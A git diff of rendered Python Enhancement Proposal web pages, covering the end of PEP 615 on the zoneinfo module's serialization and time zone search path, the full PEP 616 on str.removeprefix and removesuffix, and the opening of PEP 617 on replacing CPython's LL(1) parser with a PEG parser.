  1. ZoneInfo(key): When constructed with the primary constructor, a +ZoneInfo object will be serialized by key, and when deserialized the +will use the primary constructor in the deserializing process, and thus be +expected to be the same object as other references to the same time zone. +For example, if europe_berlin_pkl is a string containing a pickle +constructed from ZoneInfo("Europe/Berlin"), one would expect the +following behavior:
    >>> a = ZoneInfo("Europe/Berlin")
    +>>> b = pickle.loads(europe_berlin_pkl)
    +>>> a is b
    +True
    +
    +
    +
  2. +
  3. ZoneInfo.no_cache(key): When constructed from the cache-bypassing +constructor, the ZoneInfo object will still be serialized by key, but +when deserialized, it will use the cache bypassing constructor. If +europe_berlin_pkl_nc is a string containing a pickle constructed from +ZoneInfo.no_cache("Europe/Berlin"), one would expect the following +behavior:
    >>> a = ZoneInfo("Europe/Berlin")
    +>>> b = pickle.loads(europe_berlin_pkl_nc)
    +>>> a is b
    +False
    +
    +
    +
  4. +
  5. ZoneInfo.from_file(fobj, /, key=None): When constructed from a file, the +ZoneInfo object will raise an exception on pickling. If an end user +wants to pickle a ZoneInfo constructed from a file, it is recommended +that they use a wrapper type or a custom serialization function: either +serializing by key or storing the contents of the file object and +serializing that.
  6. +
+

This method of serialization requires that the time zone data for the required +key be available on both the serializing and deserializing side, similar to the +way that references to classes and functions are expected to exist in both the +serializing and deserializing environments. It also means that no guarantees +are made about the consistency of results when unpickling a ZoneInfo +pickled in an environment with a different version of the time zone data.

+
+
+
+

Sources for time zone data

+

One of the hardest challenges for IANA time zone support is keeping the data up +to date; between 1997 and 2020, there have been between 3 and 21 releases per +year, often in response to changes in time zone rules with little to no notice +(see [7] for more details). In order to keep up to date, +and to give the system administrator control over the data source, we propose +to use system-deployed time zone data wherever possible. However, not all +systems ship a publicly accessible time zone database — notably Windows uses a +different system for managing time zones — and so if available zoneinfo +falls back to an installable first-party package, tzdata, available on +PyPI. [d] If no system zoneinfo files are found but tzdata is installed, the +primary ZoneInfo constructor will use tzdata as the time zone source.

+
+

System time zone information

+

Many Unix-like systems deploy time zone data by default, or provide a canonical +time zone data package (often called tzdata, as it is on Arch Linux, Fedora, +and Debian). Whenever possible, it would be preferable to defer to the system +time zone information, because this allows time zone information for all +language stacks to be updated and maintained in one place. Python distributors +are encouraged to ensure that time zone data is installed alongside Python +whenever possible (e.g. by declaring tzdata as a dependency for the +python package).

+

The zoneinfo module will use a “search path” strategy analogous to the +PATH environment variable or the sys.path variable in Python; the +zoneinfo.TZPATH variable will be read-only (see search-path-config for +more details), ordered list of time zone data locations to search. When +creating a ZoneInfo instance from a key, the zone file will be constructed +from the first data source on the path in which the key exists, so for example, +if TZPATH were:

+
TZPATH = (
+    "/usr/share/zoneinfo",
+    "/etc/zoneinfo"
+    )
+
+
+

and (although this would be very unusual) /usr/share/zoneinfo contained +only America/New_York and /etc/zoneinfo contained both +America/New_York and Europe/Moscow, then +ZoneInfo("America/New_York") would be satisfied by +/usr/share/zoneinfo/America/New_York, while ZoneInfo("Europe/Moscow") +would be satisfied by /etc/zoneinfo/Europe/Moscow.

+

At the moment, on Windows systems, the search path will default to empty, +because Windows does not officially ship a copy of the time zone database. On +non-Windows systems, the search path will default to a list of the most +commonly observed search paths. Although this is subject to change in future +versions, at launch the default search path will be:

+
TZPATH = (
+    "/usr/share/zoneinfo",
+    "/usr/lib/zoneinfo",
+    "/usr/share/lib/zoneinfo",
+    "/etc/zoneinfo",
+)
+
+
+

This may be configured both at compile time or at runtime; more information on +configuration options at search-path-config.

+
+
+

The tzdata Python package

+

In order to ensure easy access to time zone data for all end users, this PEP +proposes to create a data-only package tzdata as a fallback for when system +data is not available. The tzdata package would be distributed on PyPI as +a “first party” package [d], maintained by the CPython development team.

+

The tzdata package contains only data and metadata, with no public-facing +functions or classes. It will be designed to be compatible with both newer +importlib.resources [11] access patterns and older +access patterns like pkgutil.get_data [12] .

+

While it is designed explicitly for the use of CPython, the tzdata package +is intended as a public package in its own right, and it may be used as an +“official” source of time zone data for third party Python packages.

+
+
+
+

Search path configuration

+

The time zone search path is very system-dependent, and sometimes even +application-dependent, and as such it makes sense to provide options to +customize it. This PEP provides for three such avenues for customization:

+
    +
  1. Global configuration via a compile-time option
  2. +
  3. Per-run configuration via environment variables
  4. +
  5. Runtime configuration change via a reset_tzpath function
  6. +
+

In all methods of configuration, the search path must consist of only absolute, +rather than relative paths. Implementations may choose to ignore, warn or raise +an exception if a string other than an absolute path is found (and may make +different choices depending on the context — e.g. raising an exception when an +invalid path is passed to reset_tzpath but warning when one is included in +the environment variable). If an exception is not raised, any strings other +than an absolute path must not be included in the time zone search path.

+
+

Compile-time options

+

It is most likely that downstream distributors will know exactly where their +system time zone data is deployed, and so a compile-time option +PYTHONTZPATH will be provided to set the default search path.

+

The PYTHONTZPATH option should be a string delimited by os.pathsep, +listing possible locations for the time zone data to be deployed (e.g. +/usr/share/zoneinfo).

+
+
+

Environment variables

+

When initializing TZPATH (and whenever reset_tzpath is called with no +arguments), the zoneinfo module will use the environment variable +PYTHONTZPATH, if it exists, to set the search path.

+

PYTHONTZPATH is an os.pathsep-delimited string which replaces (rather +than augments) the default time zone path. Some examples of the proposed +semantics:

+
$ python print_tzpath.py
+("/usr/share/zoneinfo",
+ "/usr/lib/zoneinfo",
+ "/usr/share/lib/zoneinfo",
+ "/etc/zoneinfo")
+
+$ PYTHONTZPATH="/etc/zoneinfo:/usr/share/zoneinfo" python print_tzpath.py
+("/etc/zoneinfo",
+ "/usr/share/zoneinfo")
+
+$ PYTHONTZPATH="" python print_tzpath.py
+()
+
+
+

This provides no built-in mechanism for prepending or appending to the default +search path, as these use cases are likely to be somewhat more niche. It should +be possible to populate an environment variable with the default search path +fairly easily:

+
$ export DEFAULT_TZPATH=$(python -c \
+    "import os, zoneinfo; print(os.pathsep.join(zoneinfo.TZPATH))")
+
+
+
+
+

reset_tzpath function

+

zoneinfo provides a reset_tzpath function that allows for changing the +search path at runtime.

+
def reset_tzpath(
+    to: Optional[Sequence[Union[str, os.PathLike]]] = None
+) -> None:
+    ...
+
+
+

When called with a sequence of paths, this function sets zoneinfo.TZPATH to +a tuple constructed from the desired value. When called with no arguments or +None, this function resets zoneinfo.TZPATH to the default +configuration.

+

This is likely to be primarily useful for (permanently or temporarily) +disabling the use of system time zone paths and forcing the module to use the +tzdata package. It is not likely that reset_tzpath will be a common +operation, save perhaps in test functions sensitive to time zone configuration, +but it seems preferable to provide an official mechanism for changing this +rather than allowing a proliferation of hacks around the immutability of +TZPATH.

+
+

Caution

+

Although changing TZPATH during a run is a supported operation, users +should be advised that doing so may occasionally lead to unusual semantics, +and when making design trade-offs greater weight will be afforded to using +a static TZPATH, which is the much more common use case.

+
+

As noted in Constructors, the primary ZoneInfo constructor employs a cache +to ensure that two identically-constructed ZoneInfo objects always compare +as identical (i.e. ZoneInfo(key) is ZoneInfo(key)), and the nature of this +cache is implementation-defined. This means that the behavior of the +ZoneInfo constructor may be unpredictably inconsistent in some situations +when used with the same key under different values of TZPATH. For +example:

+
>>> reset_tzpath(to=["/my/custom/tzdb"])
+>>> a = ZoneInfo("My/Custom/Zone")
+>>> reset_tzpath()
+>>> b = ZoneInfo("My/Custom/Zone")
+>>> del a
+>>> del b
+>>> c = ZoneInfo("My/Custom/Zone")
+
+
+

In this example, My/Custom/Zone exists only in the /my/custom/tzdb and +not on the default search path. In all implementations the constructor for +a must succeed. It is implementation-defined whether the constructor for +b succeeds, but if it does, it must be true that a is b, because both +a and b are references to the same key. It is also +implementation-defined whether the constructor for c succeeds. +Implementations of zoneinfo may return the object constructed in previous +constructor calls, or they may fail with an exception.

+
+
+
+
+

Backwards Compatibility

+

This will have no backwards compatibility issues as it will create a new API.

+

With only minor modification, a backport with support for Python 3.6+ of the +zoneinfo module could be created.

+

The tzdata package is designed to be “data only”, and should support any +version of Python that it can be built for (including Python 2.7).

+
+
+

Security Implications

+

This will require parsing zoneinfo data from disk, mostly from system locations +but potentially from user-supplied data. Errors in the implementation +(particularly the C code) could cause potential security issues, but there is +no special risk relative to parsing other file types.

+

Because the time zone data keys are essentially paths relative to some time +zone root, implementations should take care to avoid path traversal attacks. +Requesting keys such as ../../../path/to/something should not reveal +anything about the state of the file system outside of the time zone path.

+
+
+

Reference Implementation

+

An initial reference implementation is available at +https://github.com/pganssle/zoneinfo

+

This may eventually be converted into a backport for 3.6+.

+
+
+

Rejected Ideas

+
+

Building a custom tzdb compiler

+

One major concern with the use of the TZif format is that it does not actually +contain enough information to always correctly determine the value to return +for tzinfo.dst(). This is because for any given time zone offset, TZif +only marks the UTC offset and whether or not it represents a DST offset, but +tzinfo.dst() returns the total amount of the DST shift, so that the +“standard” offset can be reconstructed from datetime.utcoffset() - +datetime.dst(). The value to use for dst() can be determined by finding +the equivalent STD offset and calculating the difference, but the TZif format +does not specify which offsets form STD/DST pairs, and so heuristics must be +used to determine this.

+

One common heuristic — looking at the most recent standard offset — notably +fails in the case of the time zone changes in Portugal in 1992 and 1996, where +the “standard” offset was shifted by 1 hour during a DST transition, leading to +a transition from STD to DST status with no change in offset. In fact, it is +possible (though it has never happened) for a time zone to be created that is +permanently DST and has no standard offsets.

+

Although this information is missing in the compiled TZif binaries, it is +present in the raw tzdb files, and it would be possible to parse this +information ourselves and create a more suitable binary format.

+

This idea was rejected for several reasons:

+
    +
  1. It precludes the use of any system-deployed time zone information, which is +usually present only in TZif format.
  2. +
  3. The raw tzdb format, while stable, is less stable than the TZif format; +some downstream tzdb parsers have already run into problems with old +deployments of their custom parsers becoming incompatible with recent tzdb +releases, leading to the creation of a “rearguard” format to ease the +transition. [8]
  4. +
  5. Heuristics currently suffice in dateutil and pytz for all known time +zones, historical and present, and it is not very likely that new time zones +will appear that cannot be captured by heuristics — though it is somewhat +more likely that new rules that are not captured by the current generation +of heuristics will appear; in that case, bugfixes would be required to +accommodate the changed situation.
  6. +
  7. The dst() method’s utility (and in fact the isdst parameter in TZif) +is somewhat questionable to start with, as almost all the useful information +is contained in the utcoffset() and tzname() methods, which are not +subject to the same problems.
  8. +
+

In short, maintaining a custom tzdb compiler or compiled package adds +maintenance burdens to both the CPython dev team and system administrators, and +its main benefit is to address a hypothetical failure that would likely have +minimal real world effects were it to occur.

+
+
+

Including tzdata in the standard library by default

+

Although PEP 453, which introduced the ensurepip +mechanism to CPython, provides a convenient template for a standard library +module maintained on PyPI, a potentially similar ensuretzdata mechanism is +somewhat less necessary, and would be complicated enough that it is considered +out of scope for this PEP.

+

Because the zoneinfo module is designed to use the system time zone data +wherever possible, the tzdata package is unnecessary (and may be +undesirable) on systems that deploy time zone data, and so it does not seem +critical to ship tzdata with CPython.

+

It is also not yet clear how these hybrid standard library / PyPI modules +should be updated, (other than pip, which has a natural mechanism for +updates and notifications) and since it is not critical to the operation of the +module, it seems prudent to defer any such proposal.

+
+
+

Support for leap seconds

+

In addition to time zone offset and name rules, the IANA time zone database +also provides a source of leap second data. This is deemed out of scope because +datetime.datetime currently has no support for leap seconds, and the +question of leap second data can be deferred until leap second support is +added.

+

The first-party tzdata package should ship the leap second data, even if it +is not used by the zoneinfo module.

+
+
+

Using a pytz-like interface

+

A pytz-like ([18]) interface was proposed in PEP 431, but +was ultimately withdrawn / rejected for lack of ambiguous datetime support. +PEP 495 added the fold attribute to address this problem, but +fold obviates the need for pytz’s non-standard tzinfo classes, and +so a pytz-like interface is no longer necessary. [2]

+

The zoneinfo approach is more closely based on dateutil.tz, which +implemented support for fold (including a backport to older versions) just +before the release of Python 3.6.

+
+
+

Windows support via Microsoft’s ICU API

+

Windows does not ship the time zone database as TZif files, but as of Windows +10’s 2017 Creators Update, Microsoft has provided an API for interacting with +the International Components for Unicode (ICU) project [13] +[14] , which includes an API for accessing time zone data — +sourced from the IANA time zone database. [15]

+

Providing bindings for this would allow us to support Windows “out of the box” +without the need to install the tzdata package, but unfortunately the C +headers provided by Windows do not provide any access to the underlying time +zone data — only an API to query the system for transition and offset +information is available. This would constrain the semantics of any ICU-based +implementation in ways that may not be compatible with a non-ICU-based +implementation — particularly around the behavior of the cache.

+

Since it seems like ICU cannot be used as simply an additional data source for +ZoneInfo objects, this PEP considers the ICU support to be out of scope, and +probably better supported by a third-party library.

+
+
+

Alternative environment variable configurations

+

This PEP proposes to use a single environment variable: PYTHONTZPATH. +This is based on the assumption that the majority of users who would want to +manipulate the time zone path would want to fully replace it (e.g. “I know +exactly where my time zone data is”), and other use cases like prepending to +the existing search path would be less common.

+

There are several other schemes that were considered and rejected:

+
    +
  1. Separate PYTHON_TZPATH into two environment variables: +DEFAULT_PYTHONTZPATH and PYTHONTZPATH, where PYTHONTZPATH would +contain values to append (or prepend) to the default time zone path, and +DEFAULT_PYTHONTZPATH would replace the default time zone path. This +was rejected because it would likely lead to user confusion if the primary +use case is to replace rather than augment.
  2. +
  3. Adding either PYTHONTZPATH_PREPEND, PYTHONTZPATH_APPEND or both, so +that users can augment the search path on either end without attempting to +determine what the default time zone path is. This was rejected as likely to +be unnecessary, and because it could easily be added in a +backwards-compatible manner in future updates if there is much demand for +such a feature.
  4. +
  5. Use only the PYTHONTZPATH variable, but provide a custom special value +that represents the default time zone path, e.g. <<DEFAULT_TZPATH>>, so +users could append to the time zone path with, e.g. +PYTHONTZPATH=<<DEFAULT_TZPATH>>:/my/path could be used to append +/my/path to the end of the time zone path.

    One advantage to this scheme would be that it would add a natural extension +point for specifying non-file-based elements on the search path, such as +changing the priority of tzdata if it exists, or if native support for +TZDIST were to be added to the library in the future.

    +

    This was rejected mainly because these sort of special values are not +usually found in PATH-like variables and the only currently proposed use +case is a stand-in for the default TZPATH, which can be acquired by +executing a Python program to query for the default value. An additional +factor in rejecting this is that because PYTHONTZPATH accepts only +absolute paths, any string that does not represent a valid absolute path is +implicitly reserved for future use, so it would be possible to introduce +these special values as necessary in a backwards-compatible way in future +versions of the library.

    +
  6. +
+
+
+

Using the datetime module

+

One possible idea would be to add ZoneInfo to the datetime module, +rather than giving it its own separate module. This PEP favors the use of +a separate zoneinfo module,though a nested datetime.zoneinfo module +was also under consideration.

+
+

Arguments against putting ZoneInfo directly into datetime

+

The datetime module is already somewhat crowded, as it has many classes +with somewhat complex behavior — datetime.datetime, datetime.date, +datetime.time, datetime.timedelta, datetime.timezone and +datetime.tzinfo. The module’s implementation and documentation are already +quite complicated, and it is probably beneficial to try to not to compound the +problem if it can be helped.

+

The ZoneInfo class is also in some ways different from all the other +classes provided by datetime; the other classes are all intended to be +lean, simple data types, whereas the ZoneInfo class is more complex: it is +a parser for a specific format (TZif), a representation for the information +stored in that format and a mechanism to look up the information in well-known +locations in the system.

+

Finally, while it is true that someone who needs the zoneinfo module also +needs the datetime module, the reverse is not necessarily true: many people +will want to use datetime without zoneinfo. Considering that +zoneinfo will likely pull in additional, possibly more heavy-weight +standard library modules, it would be preferable to allow the two to be +imported separately — particularly if potential “tree shaking” distributions +are in Python’s future. [9]

+

In the final analysis, it makes sense to keep zoneinfo a separate module +with a separate documentation page rather than to put its classes and functions +directly into datetime.

+
+
+

Using datetime.zoneinfo instead of zoneinfo

+

A more palatable configuration may be to nest zoneinfo as a module under +datetime, as datetime.zoneinfo.

+

Arguments in favor of this:

+
    +
  1. It neatly namespaces zoneinfo together with datetime
  2. +
  3. The timezone class is already in datetime, and it may seem strange +that some time zones are in datetime and others are in a top-level +module.
  4. +
  5. As mentioned earlier, importing zoneinfo necessarily requires importing +datetime, so it is no imposition to require importing the parent module.
  6. +
+

Arguments against this:

+
    +
  1. In order to avoid forcing all datetime users to import zoneinfo, the +zoneinfo module would need to be lazily imported, which means that +end-users would need to explicitly import datetime.zoneinfo (as opposed +to importing datetime and accessing the zoneinfo attribute on the +module). This is the way dateutil works (all submodules are lazily +imported), and it is a perennial source of confusion for end users.

    This confusing requirement from end-users can be avoided using a +module-level __getattr__ and __dir__ per PEP 562, but this would +add some complexity to the implementation of the datetime module. This +sort of behavior in modules or classes tends to confuse static analysis +tools, which may not be desirable for a library as widely used and critical +as datetime.

    +
  2. +
  3. Nesting the implementation under datetime would likely require +datetime to be reorganized from a single-file module (datetime.py) +to a directory with an __init__.py. This is a minor concern, but the +structure of the datetime module has been stable for many years, and it +would be preferable to avoid churn if possible.

    This concern could be alleviated by implementing zoneinfo as +_zoneinfo.py and importing it as zoneinfo from within datetime, +but this does not seem desirable from an aesthetic or code organization +standpoint, and it would preclude the version of nesting where end users are +required to explicitly import datetime.zoneinfo.

    +
  4. +
+

This PEP takes the position that on balance it would be best to use a separate +top-level zoneinfo module because the benefits of nesting are not so great +that it overwhelms the practical implementation concerns.

+
+
+
+
+

Footnotes

+
+
+
[a]
+
The claim that the vast majority of users only want a few types of time +zone is based on anecdotal impressions rather than anything remotely +scientific. As one data point, dateutil provides many time zone types, +but user support mostly focuses on these three types.
+
+
[b]
+
The statement that identically constructed ZoneInfo objects should be +identical objects may be violated if the user deliberately clears the time +zone cache.
+
+
[c]
+
The hash value for a given datetime is cached on first calculation, so +we do not need to worry about the possibly more serious issue that a given +datetime object’s hash would change during its lifetime.
+
+
[d] (1, 2, 3)
+
The term “first party” here is distinguished from “third party” in that, +although it is distributed via PyPI and is not currently included in +Python by default, it is to be considered an official sub-project of +CPython rather than a “blessed” third-party package.
+
+
+
+

References

+ +
+

Other time zone implementations:

+ +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0615.rst

+

Last modified: 2024-06-01 20:10:03 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0616/index.html b/pep-0616/index.html new file mode 100644 index 00000000000..803beb5f3ec --- /dev/null +++ b/pep-0616/index.html @@ -0,0 +1,496 @@ + + + + + + + + PEP 616 – String methods to remove prefixes and suffixes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 616 – String methods to remove prefixes and suffixes

+
+
Author:
+
Dennis Sweeney <sweeney.dennis650 at gmail.com>
+
Sponsor:
+
Eric V. Smith <eric at trueblade.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Mar-2020
+
Python-Version:
+
3.9
+
Post-History:
+
20-Mar-2020
+
+
+
+
Table of Contents +
+
+

Abstract

+

This is a proposal to add two new methods, removeprefix() and +removesuffix(), to the APIs of Python’s various string objects. These +methods would remove a prefix or suffix (respectively) from a string, +if present, and would be added to Unicode str objects, binary +bytes and bytearray objects, and collections.UserString.

+
+
+

Rationale

+

There have been repeated issues on Python-Ideas [2] [3], +Python-Dev [4] [5] [6] [7], the Bug Tracker, and +StackOverflow [8], related to user confusion about the +existing str.lstrip and str.rstrip methods. These users are +typically expecting the behavior of removeprefix and removesuffix, +but they are surprised that the parameter for lstrip is +interpreted as a set of characters, not a substring. This repeated +issue is evidence that these methods are useful. The new methods +allow a cleaner redirection of users to the desired behavior.

+

As another testimonial for the usefulness of these methods, several +users on Python-Ideas [2] reported frequently including similar +functions in their code for productivity. The implementation +often contained subtle mistakes regarding the handling of the empty +string, so a well-tested built-in method would be useful.

+

The existing solutions for creating the desired behavior are to either +implement the methods as in the Specification below, or to use +regular expressions as in the expression +re.sub('^' + re.escape(prefix), '', s), which is less discoverable, +requires a module import, and results in less readable code.

+
+
+

Specification

+

The builtin str class will gain two new methods which will behave +as follows when type(self) is type(prefix) is type(suffix) is str:

+
def removeprefix(self: str, prefix: str, /) -> str:
+    if self.startswith(prefix):
+        return self[len(prefix):]
+    else:
+        return self[:]
+
+def removesuffix(self: str, suffix: str, /) -> str:
+    # suffix='' should not call self[:-0].
+    if suffix and self.endswith(suffix):
+        return self[:-len(suffix)]
+    else:
+        return self[:]
+
+
+

When the arguments are instances of str subclasses, the methods should +behave as though those arguments were first coerced to base str +objects, and the return value should always be a base str.

+

Methods with the corresponding semantics will be added to the builtin +bytes and bytearray objects. If b is either a bytes +or bytearray object, then b.removeprefix() and b.removesuffix() +will accept any bytes-like object as an argument. The two methods will +also be added to collections.UserString, with similar behavior.

+
+
+

Motivating examples from the Python standard library

+

The examples below demonstrate how the proposed methods can make code +one or more of the following:

+
    +
  1. Less fragile:

    The code will not depend on the user to count the length of a literal.

    +
  2. +
  3. More performant:

    The code does not require a call to the Python built-in len +function nor to the more expensive str.replace() method.

    +
  4. +
  5. More descriptive:

    The methods give a higher-level API for code readability as +opposed to the traditional method of string slicing.

    +
  6. +
+
+

find_recursionlimit.py

+
    +
  • Current:
    if test_func_name.startswith("test_"):
    +    print(test_func_name[5:])
    +else:
    +    print(test_func_name)
    +
    +
    +
  • +
  • Improved:
    print(test_func_name.removeprefix("test_"))
    +
    +
    +
  • +
+
+
+

deccheck.py

+

This is an interesting case because the author chose to use the +str.replace method in a situation where only a prefix was +intended to be removed.

+
    +
  • Current:
    if funcname.startswith("context."):
    +    self.funcname = funcname.replace("context.", "")
    +    self.contextfunc = True
    +else:
    +    self.funcname = funcname
    +    self.contextfunc = False
    +
    +
    +
  • +
  • Improved:
    if funcname.startswith("context."):
    +    self.funcname = funcname.removeprefix("context.")
    +    self.contextfunc = True
    +else:
    +    self.funcname = funcname
    +    self.contextfunc = False
    +
    +
    +
  • +
  • Arguably further improved:
    self.contextfunc = funcname.startswith("context.")
    +self.funcname = funcname.removeprefix("context.")
    +
    +
    +
  • +
+
+
+

cookiejar.py

+
    +
  • Current:
    def strip_quotes(text):
    +    if text.startswith('"'):
    +        text = text[1:]
    +    if text.endswith('"'):
    +        text = text[:-1]
    +    return text
    +
    +
    +
  • +
  • Improved:
    def strip_quotes(text):
    +    return text.removeprefix('"').removesuffix('"')
    +
    +
    +
  • +
+
+
+

test_i18n.py

+
    +
  • Current:
    creationDate = header['POT-Creation-Date']
    +
    +# peel off the escaped newline at the end of string
    +if creationDate.endswith('\\n'):
    +    creationDate = creationDate[:-len('\\n')]
    +
    +
    +
  • +
  • Improved:
    creationDate = header['POT-Creation-Date'].removesuffix('\\n')
    +
    +
    +
  • +
+

There were many other such examples in the stdlib.

+
+
+
+

Rejected Ideas

+
+

Expand the lstrip and rstrip APIs

+

Because lstrip takes a string as its argument, it could be viewed +as taking an iterable of length-1 strings. The API could, therefore, be +generalized to accept any iterable of strings, which would be +successively removed as prefixes. While this behavior would be +consistent, it would not be obvious for users to have to call +'foobar'.lstrip(('foo',)) for the common use case of a +single prefix.

+
+
+

Remove multiple copies of a prefix

+

This is the behavior that would be consistent with the aforementioned +expansion of the lstrip/rstrip API – repeatedly applying the +function until the argument is unchanged. This behavior is attainable +from the proposed behavior via by the following:

+
>>> s = 'Foo' * 100 + 'Bar'
+>>> prefix = 'Foo'
+>>> while s.startswith(prefix): s = s.removeprefix(prefix)
+>>> s
+'Bar'
+
+
+
+
+

Raising an exception when not found

+

There was a suggestion that s.removeprefix(pre) should raise an +exception if not s.startswith(pre). However, this does not match +with the behavior and feel of other string methods. There could be +required=False keyword added, but this violates the KISS +principle.

+
+
+

Accepting a tuple of affixes

+

It could be convenient to write the test_concurrent_futures.py +example above as name.removesuffix(('Mixin', 'Tests', 'Test')), so +there was a suggestion that the new methods be able to take a tuple of +strings as an argument, similar to the startswith() API. Within +the tuple, only the first matching affix would be removed. This was +rejected on the following grounds:

+
    +
  • This behavior can be surprising or visually confusing, especially +when one prefix is empty or is a substring of another prefix, as in +'FooBar'.removeprefix(('', 'Foo')) == 'FooBar' +or 'FooBar text'.removeprefix(('Foo', 'FooBar ')) == 'Bar text'.
  • +
  • The API for str.replace() only accepts a single pair of +replacement strings, but has stood the test of time by refusing the +temptation to guess in the face of ambiguous multiple replacements.
  • +
  • There may be a compelling use case for such a feature in the future, +but generalization before the basic feature sees real-world use would +be easy to get permanently wrong.
  • +
+
+
+

Alternative Method Names

+

Several alternatives method names have been proposed. Some are listed +below, along with commentary for why they should be rejected in favor +of removeprefix (the same arguments hold for removesuffix).

+
    +
  • ltrim, trimprefix, etc.:

    “Trim” does in other languages (e.g. JavaScript, Java, Go, PHP) +what strip methods do in Python.

    +
  • +
  • lstrip(string=...)

    This would avoid adding a new method, but for different +behavior, it’s better to have two different methods than one +method with a keyword argument that selects the behavior.

    +
  • +
  • remove_prefix:

    All of the other methods of the string API, e.g. +str.startswith(), use lowercase rather than +lower_case_with_underscores.

    +
  • +
  • removeleft, leftremove, or lremove:

    The explicitness of “prefix” is preferred.

    +
  • +
  • cutprefix, deleteprefix, withoutprefix, dropprefix, etc.:

    Many of these might have been acceptable, but “remove” is +unambiguous and matches how one would describe the “remove the prefix” +behavior in English.

    +
  • +
  • stripprefix:

    Users may benefit from remembering that “strip” means working +with sets of characters, while other methods work with +substrings, so re-using “strip” here should be avoided.

    +
  • +
+
+
+
+

How to Teach This

+

Among the uses for the partition(), startswith(), and +split() string methods or the enumerate() or zip() +built-in functions, a common theme is that if a beginner finds +themselves manually indexing or slicing a string, then they should +consider whether there is a higher-level method that better +communicates what the code should do rather than merely how the +code should do it. The proposed removeprefix() and +removesuffix() methods expand the high-level string “toolbox” and +further allow for this sort of skepticism toward manual slicing.

+

The main opportunity for user confusion will be the conflation of +lstrip/rstrip with removeprefix/removesuffix. +It may therefore be helpful to emphasize (as the documentation will) +the following differences between the methods:

+
    +
  • (l/r)strip:
      +
    • The argument is interpreted as a character set.
    • +
    • The characters are repeatedly removed from the appropriate end of +the string.
    • +
    +
  • +
  • remove(prefix/suffix):
      +
    • The argument is interpreted as an unbroken substring.
    • +
    • Only at most one copy of the prefix/suffix is removed.
    • +
    +
  • +
+
+
+

Reference Implementation

+

See the pull request on GitHub [1].

+
+
+

History of Major revisions

+
    +
  • Version 3: Remove tuple behavior.
  • +
  • Version 2: Changed name to removeprefix/removesuffix; +added support for tuples as arguments
  • +
  • Version 1: Initial draft with cutprefix/cutsuffix
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0616.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0617/index.html b/pep-0617/index.html new file mode 100644 index 00000000000..909f9a94dcc --- /dev/null +++ b/pep-0617/index.html @@ -0,0 +1,904 @@ + + + + + + + + PEP 617 – New PEG parser for CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 617 – New PEG parser for CPython

+
+
Author:
+
Guido van Rossum <guido at python.org>, +Pablo Galindo <pablogsal at python.org>, +Lysandros Nikolaou <lisandrosnik at gmail.com>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Mar-2020
+
Python-Version:
+
3.9
+
Post-History:
+
02-Apr-2020
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Full Grammar specification.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Overview

+

This PEP proposes replacing the current LL(1)-based parser of CPython +with a new PEG-based parser. This new parser would allow the elimination of multiple +“hacks” that exist in the current grammar to circumvent the LL(1)-limitation. +It would substantially reduce the maintenance costs in some areas related to the +compiling pipeline such as the grammar, the parser and the AST generation. The new PEG +parser will also lift the LL(1) restriction on the current Python grammar.

+
+
+

Background on LL(1) parsers

+

The current Python grammar is an LL(1)-based grammar. A grammar can be said to be +LL(1) if it can be parsed by an LL(1) parser, which in turn is defined as a +top-down parser that parses the input from left to right, performing leftmost +derivation of the sentence, with just one token of lookahead. +The traditional approach to constructing or generating an LL(1) parser is to +produce a parse table which encodes the possible transitions between all possible +states of the parser. These tables are normally constructed from the first sets +and the follow sets of the grammar:

+
    +
  • Given a rule, the first set is the collection of all terminals that can occur +first in a full derivation of that rule. Intuitively, this helps the parser decide +among the alternatives in a rule. For +instance, given the rule:
    rule: A | B
    +
    +
    +

    if only A can start with the terminal a and only B can start with the +terminal b and the parser sees the token b when parsing this rule, it knows +that it needs to follow the non-terminal B.

    +
  • +
  • An extension to this simple idea is needed when a rule may expand to the empty string. +Given a rule, the follow set is the collection of terminals that can appear +immediately to the right of that rule in a partial derivation. Intuitively, this +solves the problem of the empty alternative. For instance, +given this rule:
    rule: A 'b'
    +
    +
    +

    if the parser has the token b and the non-terminal A can only start +with the token a, then the parser can tell that this is an invalid program. +But if A could expand to the empty string (called an ε-production), +then the parser would recognise a valid empty A, +since the next token b is in the follow set of A.

    +
  • +
+

The current Python grammar does not contain ε-productions, so the follow sets are not +needed when creating the parse tables. Currently, in CPython, a parser generator +program reads the grammar and produces a parsing table representing a set of +deterministic finite automata (DFA) that can be included in a C program, the +parser. The parser is a pushdown automaton that uses this data to produce a Concrete +Syntax Tree (CST) sometimes known directly as a “parse tree”. In this process, the +first sets are used indirectly when generating the DFAs.

+

LL(1) parsers and grammars are usually efficient and simple to implement +and generate. However, it is not possible, under the LL(1) restriction, +to express certain common constructs in a way natural to the language +designer and the reader. This includes some in the Python language.

+

As LL(1) parsers can only look one token ahead to distinguish +possibilities, some rules in the grammar may be ambiguous. For instance the rule:

+
rule: A | B
+
+
+

is ambiguous if the first sets of both A and B have some elements in +common. When the parser sees a token in the input +program that both A and B can start with, it is impossible for it to deduce +which option to expand, as no further token of the program can be examined to +disambiguate. +The rule may be transformed to equivalent LL(1) rules, but then it may +be harder for a human reader to grasp its meaning. +Examples later in this document show that the current LL(1)-based +grammar suffers a lot from this scenario.

+

Another broad class of rules precluded by LL(1) is left-recursive rules. +A rule is left-recursive if it can derive to a +sentential form with itself as the leftmost symbol. For instance this rule:

+
rule: rule 'a'
+
+
+

is left-recursive because the rule can be expanded to an expression that starts +with itself. As will be described later, left-recursion is the natural way to +express certain desired language properties directly in the grammar.

+
+
+

Background on PEG parsers

+

